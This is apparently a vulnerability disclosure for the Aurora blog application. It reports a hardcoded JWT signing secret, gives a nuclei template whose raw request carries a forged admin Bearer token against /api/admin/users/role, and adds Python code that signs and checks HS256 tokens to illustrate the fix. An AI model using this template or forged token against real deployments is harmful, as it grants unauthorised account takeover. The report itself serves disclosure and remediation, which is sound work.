aurora
[vulnerability] Unauthorised Access Vulnerability
1. Steps to reproduce
Modify the sub field in the JWT to the id of another user to assume that user's identity.
The nuclei template is as follows:
```yaml
id: aurora-jwt-hardencoding

info:
  name: Aurora blog jwt secret key hardencoding
  author: calico
  severity: high
  description: jwt secret key hardcoding leads to unauthorised access
  reference:
    - https://github.com/linhaojun857/aurora/
  tags: unauth

requests:
  - raw:
      - |+
        GET /api/admin/users/role HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJjMThlZTQxYWRmZDk0ZDYyOWQ2ZjExNTAxM2NkMjVmNiIsInN1YiI6IjEiLCJpc3MiOiJodWF3ZWltaWFuIn0.JoipYRzDC3jKAqNhV_0skiq4XikhNCmj2shMl5F1euA
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":20000'
      - type: status
        status:
          - 200
```
2. Expected behavior
The JwtAuthenticationTokenFilter retrieves the JWT from the request through the tokenService#getUserDetailDTO method, which calls the parseToken method to verify that the JWT is valid.
3. Actual behavior
In the parseToken method, the signing key for the JWT is obtained via the generalKey method.
Since SECRET is hardcoded in the source, generalKey always returns the same key, so anyone who reads the code can sign a forged JWT that passes verification.
4. Affected Version
latest
5. Fix Recommendations
Randomly generate the JWT signing key when the program starts, so the key is never present in the source.
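To make the recommendation concrete, the following is an added example (not the project's Java code) showing, in Python with only the standard library, why a runtime-generated HS256 key closes the hole: a token minted with a constant copied from the source verifies under that constant but is rejected once the key comes from the OS CSPRNG at startup. HS256 is assumed because that is the alg in the report's token header; the secret value and the check function are constructed for illustration.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Weak setting from the report: the HS256 secret is a constant in the source, so
# anyone who reads the code knows the key. The value here is a constructed placeholder.
HARDCODED_SECRET = b"placeholder-secret-copied-from-source"

# Recommended fix: derive the key once, from the OS CSPRNG, when the process starts.
# It is unguessable, differs per deployment, and never appears in the repository.
RUNTIME_SECRET = secrets.token_bytes(32)


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a compact JWT (header.payload.signature) signed with HMAC-SHA256."""
    header = _b64url(json.dumps({"alg": "HS256"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Return the claims only if the signature is valid under `key`, otherwise None."""
    try:
        header, payload, sig = token.split(".")
        if json.loads(_b64url_decode(header)).get("alg") != "HS256":
            return None  # pin the algorithm; never trust the token's own choice
        expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig)):
            return None
        return json.loads(_b64url_decode(payload))
    except (ValueError, AttributeError):  # bad base64/JSON, wrong segment count
        return None


def accepts_token_minted_with_source_constant(key_in_use: bytes) -> bool:
    """Defender's check: does the server honour a token signed with the leaked constant?
    The sub claim "1" mirrors the token shown in the report (constructed here)."""
    token = sign_hs256({"sub": "1"}, HARDCODED_SECRET)
    return verify_hs256(token, key_in_use) is not None
```

With `RUNTIME_SECRET` in use, the check returns False; it returns True only while the hardcoded constant is still the active key.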